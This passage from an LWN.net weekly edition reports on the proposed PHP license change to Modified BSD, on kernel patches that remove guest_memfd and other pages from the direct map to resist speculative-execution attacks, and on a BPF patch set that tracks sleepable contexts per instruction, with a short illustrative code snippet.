[...] Typically, when changing the license on an open source project, one must gain approval from all copyright owners, since the rights granted might change under the terms of the new license. However, as described in this section and in other places in this document, changing to the Modified BSD License does not change any of the rights granted by contributors who are not the PHP Group or Perforce Software.

Even though the RFC asserts that the project does not require permission, it says that the discussion would remain open for at least six months "as a courtesy" to ensure that interested parties had an opportunity to respond. Ramsey has provided updates a few times since the RFC's announcement in July, reminding people that the topic was still under discussion; thus far, it does not seem that anyone has objected.

A few people have had questions, of course. Rethans wondered "why wait until (specifically) PHP 9, and not PHP-next (the one after 8.5)?" Ramsey said that there were no technical or legal reasons; it just seemed like the PHP 9 release would be the right time to make the change. If others thought 8.6 would be the appropriate time, that was also fine. The RFC was later updated to change the proposal to the "next version" of PHP.

Peter Kokot suggested that GPL-compatibility should be "just slightly clarified to make PHP usage simpler in the future for cases when GPL-licensed software is involved". He pointed out that PHP has the option to be linked with two GPLv3-licensed libraries: the GNU Readline library and the GNU dbm (GDBM) database library. He was thinking of deprecating the build-time options for linking against those libraries to make PHP "worry-free for packagers"; ultimately, the ability to link against GDBM and Readline would be removed entirely. Ramsey said that the change would make things simpler for packagers:

For those who are packaging PHP and linking against GPL libraries, the current PHP License, version 3.01, presents an incompatibility that cannot be resolved because of the additional restrictions it places on users. However, under the Modified BSD License, there is no incompatibility, as long as the combined package is released under the terms of the GPL.

On March 14, Ramsey announced that he was opening voting on the RFC. The votes are public and tallied on the PHP wiki in the body of the RFC. It is unclear how many eligible voters there are currently; in 2019, there were 180 people with voting privileges. At the moment, 47 people have voted in favor and two have abstained; even though the early results seem overwhelmingly positive, it is not yet certain that the proposal will pass. If it does, though, it will be largely thanks to the work that Ramsey has put in over the past few years: behind-the-scenes conversations, getting approvals, and shepherding the RFC to a final vote.

Comments (3 posted)

More efficient removal of pages from the direct map

By Jonathan Corbet
March 25, 2026
The kernel's direct map provides code running in kernel mode with direct access to all physical memory installed in the system — on 64-bit systems, at least. It obviously makes life easier for kernel developers, but the direct map also brings some problems of its own, most of which are security-related. Interest in removing at least some pages from the direct map has been simmering for years; a couple of patch sets under discussion show some use cases for memory that has been removed from the direct map, and how such memory might be efficiently managed.

The good thing about the direct map is that it gives the kernel easy access to all of the system's installed memory. That is also the bad thing about the direct map, of course. When all of memory is accessible, it becomes a target for attackers. A stray pointer might be pressed into service to corrupt data anywhere in the system (though technologies like supervisor mode access prevention can help). Directly mapped memory is also susceptible to speculative-execution attacks, which can be employed to exfiltrate information from the kernel or from an unrelated process or virtual machine.

Many of these attacks can be thwarted by removing memory from the direct map; if memory is not reachable, the kernel cannot access it and, as a result, cannot disclose or modify its contents. The memfd_secret() system call will remove memory from the direct map for this reason, but wider use of direct-map removal has been slow to come. Memory that is not in the direct map is harder to manage, and there are a number of performance problems that can be caused by removing memory from the direct map. So, while various patches have been in circulation for a while, they have not generally cleared the bar for inclusion in the mainline kernel.

guest_memfd

A common use case for large Linux systems is to run virtualized guests, often hosting multiple unrelated — and possibly hostile — users. It should come as no surprise that there are attackers out there who are interested in targeting some of those virtual machines from others on the same host. There are a number of efforts being made to thwart such attacks, at both the hardware and software levels; one of those is this patch set implementing direct-map removal of guest_memfd pages, posted by Nikita Kalyazin, built on work initially posted by Patrick Roy.

A guest_memfd is a form of memfd (a block of memory attached to a file descriptor) intended for use by virtual machines. This memory has a number of special characteristics, including the fact that it cannot normally be mapped into user space on the host system. That makes attacks from the host a bit harder, but there is more that can be done.

On systems with the right sort of hardware support, memory in a guest_memfd can be encrypted, making access from outside the virtual machine impossible. Not only is the host unable to decrypt the contents of the memory; any attempt to access it will generate a machine-check exception. That makes encrypted memory into a sort of land mine that would be best removed from the host kernel's address space entirely. Beyond that, though, encrypted memory is far from universally available. On systems where guest memory is not encrypted, removing it from the direct map will make it more resistant to attacks from the host, and far less susceptible to speculative-execution attacks from hostile guests.

So this patch set adds a new flag, GUEST_MEMFD_FLAG_NO_DIRECT_MAP, to the KVM_CREATE_GUEST_MEMFD ioctl() call provided by the KVM hypervisor. When that flag is present, the memory assigned to the newly created memfd will be removed from the host kernel's direct map. Internally, the series creates a new address-space flag, AS_NO_DIRECT_MAP, to mark an address space that is not directly mapped. When the memfd is freed, the underlying memory will be restored to the kernel's direct map.

Direct-map removal creates an interesting problem: how does KVM itself, running on the host, access the memory within the guest_memfd? There are a number of operations, many having to do with emulated I/O devices, that need that sort of access. The problem is solved by mapping the guest_memfd memory into the user-space address space (on the host) of the KVM process that is running the guest; KVM can then access that memory by way of functions like copy_from_user(). The end result is that the mapping of the memory has been shifted from the kernel's address space to a specific user space. That is sufficient to protect it from speculative-execution attacks on the kernel from a different guest.

This patch series has been circulating since July 2024, and has yet to clear the bar for merging into the mainline kernel. There are a few concerns holding this kind of work back, one of which is the performance implication of fragmenting the kernel's direct map, which uses huge-page mappings whenever possible to reduce pressure on the system's translation lookaside buffer (TLB). Work done by Mike Rapoport a few years ago showed that the performance implications are not as bad as some had feared, but this fragmentation is still best avoided if possible. Meanwhile, flushing the TLB globally to reflect direct-map changes is expensive. Another roadblock, though, is that KVM can be built as a loadable module, and the memory-management developers are reluctant to export the ability to manipulate the direct map to modules. Given that there are other potential reasons to remove memory from the direct map, perhaps a better way of doing that is indicated here.

Enter the mermap

Brendan Jackman has been working on a more general address-space isolation (ASI) patch series for a while now. As a general rule, memory that does not appear within a given address space cannot be attacked by way of speculative-execution gadgets or more straightforward vulnerabilities. The kernel can already isolate its address space from user space to defend against Meltdown attacks, but this technique could be taken much farther. For example, many system calls could be at least partially implemented without access to most of the kernel's address space, with wider access only being granted for the code that strictly needs it.

Needless to say, any sort of practical address-space isolation will require removing memory from the direct map. As part of an effort to push this work forward, Jackman has posted a patch series to make the management of unmapped memory easier and more efficient.

Specifically, this series adds a new GFP flag, __GFP_UNMAPPED, that can be used to request unmapped memory from the page allocator. This allows the page allocator to manage these pages in a relatively efficient manner; they can be grouped together in a separate memory block, allowing them to be allocated and freed without changing the direct map every time (or fragmenting the direct map), and without the need for global TLB flushes. Allocating unmapped pages becomes a lot like allocating any other sort of page.

Except, of course, there are some complications. For example, another flag implemented by the page allocator is __GFP_ZERO, which requests that the pages be zero-filled. How can the kernel perform that zeroing without access to the memory involved? The answer is something that Jackman calls the "mermap", which is evidently a shortening of "ephemeral mapping". The pages in question are temporarily mapped into the kernel's address space, but only for the local CPU; they can then be zeroed, and there is no need for the global TLB flush that a wider mapping would require. An implication of this implementation, though, is that holding references to ephemerally mapped pages blocks migration for the running task, since it would lose access to those pages on any other CPU.

The page allocator needs to be able to track unmapped pages to be able to efficiently manage them. As Jackman points out in the series cover letter, the page allocator already has a mechanism for grouping pages by an attribute: the migration type, which is used to separate, for example, allocations of movable memory from those for unmovable memory. The migration type could thus be used to describe unmapped memory but, in current kernels, it can only track one attribute. A page might be both unmapped and unmovable, for example; the attributes are orthogonal to each other, and should be tracked separately. Migration types, as implemented, cannot support orthogonal attributes.

To address that shortcoming, Jackman's series adds the concept of a "freetype", described as "just a migratetype plus some flags". The current uses of migration types are, themselves, migrated to freetypes in a relatively large patch; work later in the series then adds the unmapped attribute and enables the page allocator to work with it, culminating in the implementation of __GFP_UNMAPPED.

This mechanism, once in place, would allow the guest_memfd machinery to more efficiently work with unmapped pages. It also "serves as a Trojan horse to get the page allocator into a state where adding ASI's features 'Should Be Easy'". None of that work appears in this series, though. What does appear is an update to memfd_secret() to use __GFP_UNMAPPED pages. This implementation is described as "hacky", though, since Jackman feels it could be optimized further.

The __GFP_UNMAPPED work is only in its second revision; that is early days for this sort of core page-allocator change. It is likely to require some more work before it can be considered for the mainline. This series will, though, certainly serve as fodder for discussion at the upcoming Linux Storage, Filesystem, Memory Management, and BPF Summit, to be held in early May, as will the guest_memfd work that it supports. Stay tuned.

Comments (1 posted)

Tracking when BPF programs may sleep

By Daroc Alden
March 23, 2026

BPF programs can run in both sleepable and non-sleepable (atomic) contexts. Currently, sleepable BPF programs are not allowed to enter an atomic context. Puranjay Mohan has a new patch set that changes that. The patch set would let BPF programs called in sleepable contexts temporarily acquire locks that cause the programs to transition to an atomic context. BPF maintainer Alexei Starovoitov objected to parts of the implementation, however, so acceptance of the patch depends on whether Mohan is willing and able to straighten it out.

In an atomic context, kernel code is not allowed to do anything that would delay the continued execution of the kernel, such as waiting for block I/O or faulting a page back into memory. It is usually up to the kernel programmer (assisted by the kernel's various forms of instrumentation) to make sure that they don't accidentally call a function that can sleep in such a context. BPF programs were originally only capable of running in atomic contexts, and were therefore never allowed to call functions that could sleep. In 2020, the BPF verifier was extended to handle BPF programs that could sleep (by marking the entire program with a special flag), but such programs were not permitted to call many of the existing BPF interfaces, which assumed they could transition to an atomic context.

The main advantage of marking a BPF program as sleepable is that it is allowed to copy data from user space (which can sleep if the data needs to be faulted back into memory). Since that is generally useful, it would be nice if more BPF programs could be marked as sleepable; currently, many cannot because they need to take locks or acquire resources that are only available in an atomic context. Mohan's patch set allows for more fine-grained accounting of contexts in BPF programs by having the BPF verifier track whether the program is allowed to sleep on an instruction-by-instruction basis instead of globally for the whole program.

The BPF verifier tracks which kernel resources a BPF program has access to at a given point by looking for kfuncs (kernel functions to which BPF programs have access) that are annotated with the KF_ACQUIRE and KF_RELEASE markers. When a program calls a kfunc with the KF_ACQUIRE marker, the verifier tracks the return value and ensures that the program eventually passes it back to a compatible KF_RELEASE kfunc. A preparatory patch in Mohan's series adds support for these flags to BPF iterators. The main patches add another marker, KF_FORBID_FAULT, that tells the verifier that the program is not allowed to sleep as long as it holds a reference to the acquired resource. The intention is just to prevent page faults (hence the name), but the implementation forbids all kinds of sleeps (of which page faults are a subset). KF_FORBID_FAULT can only be used on kfuncs that are already marked with KF_ACQUIRE. Once the resource is released, the program is allowed to sleep again.

In his cover letter, Mohan gave an example of when this increased granularity might be useful. The task_vma iterator lets BPF programs iterate over a task's virtual memory areas (VMAs) — but doing anything with that information is difficult, because the iterator yields vm_area_struct structures. Those structures only remain valid as long as mmap_lock is held. Taking that lock creates a context in which page faults are forbidden, since page-fault handling may need to take the same lock. With his changes, BPF programs can now read from the VMA to obtain a user-space pointer, and then explicitly release the VMA structure to exit the atomic context and interact with user space. (Although, of course, the VMA in question could be unmapped by another CPU as soon as the lock is released, so the program needs to be able to cope with failure.)

    char buf[64];

    bpf_for_each(task_vma, vma, task, 0) {
        u64 start = vma->vm_start;

        /* Faulting forbidden, but VMA pointer access allowed */

        bpf_iter_task_vma_release(&___it);

        /* mmap_lock released, VMA pointer invalidated */
        /* Faulting (and sleeping) is fine here. */

        bpf_copy_from_user(&buf, sizeof(buf), (void *)start);
    }

An earlier version of the patch set called the new kfunc marker KF_FORBID_SLEEP, but Starovoitov had concerns about the name and semantics. KF_ACQUIRE is also used for things other than locks, particularly for reference-counted resources; Starovoitov suggested differentiating between KF_ACQUIRE (for reference counts) and KF_ACQUIRE_LOCK (for actual locks), and merging the semantics of KF_FORBID_SLEEP into the latter.

Mohan was fine with that suggestion, but Eduard Zingerman thought it might be worth exploring a more radical change. The verifier currently tracks four kinds of resources that all forbid sleeping, but with different acquire/release logic: active interrupts, active RCU locks, active preemption locks, and other active locks. The list of which kfunc corresponds to which kind of acquire/release logic is hard-coded; Zingerman suggested that, if Mohan was already going to make changes to the meaning of KF_ACQUIRE, it might be worthwhile to explore separate markers for these four categories to make the verifier's logic more generic.

Mohan said that exploring the possibility is now next on his agenda after the current patch set is done. For now, the name of the new annotation was changed to KF_FORBID_FAULT to indicate a narrower intended use. Mohan's follow-up work will look at refactoring the kfunc flags to allow for more precisely identifying the type of lock being used. That may take some time, however, because Starovoitov still has problems with the implementation of the latest version of the patch set. "Sorry. This is no go. We have to go back to the drawing board with the whole thing."

Starovoitov specifically objected to the way that Mohan's code repurposed the id field of the structure that the verifier uses to track stack slots containing references to iterators. There are already several slightly different uses of IDs across the verifier — something Amery Hung is working on cleaning up — and Starovoitov doesn't want to add another one that is specific to iterators when the patch set is supposed to add a generic mechanism.

Mohan has not yet responded to Starovoitov's concerns with a new version of the patch set, but he has submitted another patch set that changes the task_vma iterator to use per-VMA locking instead of mmap_lock. The iterator copies the VMA and drops the lock before providing the VMA to the BPF program, making the iterator usable in sleepable contexts. That patch set is still undergoing revision, but it could solve the specific problem of using task_vma iterators in a sleepable context. Hopefully the more general mechanism (and Zingerman's suggested cleanup) will still be a priority for Mohan afterward, even if the newer patch set meets his needs.

Comments (none posted)

Page editor: Joe Brockmeier

Inside this week's LWN.net Weekly Edition

  • Briefs: LiteLLM compromise; Tor in Taiwan; b4 v0.15.0; 24-hour sideloading; Agama 19; Firefox 149.0; GNOME 50; Krita 5.3.0 and 6.0.0; Quotes; ...
  • Announcements: Newsletters, conferences, security updates, patches, and more.
Next page: Brief items>>

Copyright © 2026, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds